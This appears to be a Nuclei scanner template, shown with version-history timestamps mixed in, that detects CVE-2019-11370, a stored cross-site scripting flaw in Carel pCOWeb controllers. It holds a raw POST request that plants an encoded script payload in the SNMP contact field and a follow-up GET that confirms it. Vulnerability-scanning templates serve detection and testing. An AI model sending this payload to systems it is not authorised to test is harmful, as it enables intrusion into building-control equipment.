2022-07-30 12:03:57 +00:00
|
|
|
id: CVE-2019-11370
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Carel pCOWeb < B1.2.1 - Cross-Site Scripting
|
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
2022-07-30 17:56:20 +00:00
|
|
|
description: |
|
|
|
|
Carel pCOWeb < < B1.2.1 allows attackers to execute cross site scripting in /config/pw_snmp.html.
|
2022-07-30 12:03:57 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/46897
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-11370
|
2022-07-30 17:56:20 +00:00
|
|
|
- https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
|
2022-07-30 12:03:57 +00:00
|
|
|
tags: cve,xss,2019
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /config/pw_snmp_done.html HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
|
|
|
|
|
|
|
|
- |
|
|
|
|
GET /config/pw_snmp.html HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-07-31 07:35:07 +00:00
|
|
|
- '<script>alert(123)</script>'
|
2022-07-30 12:03:57 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|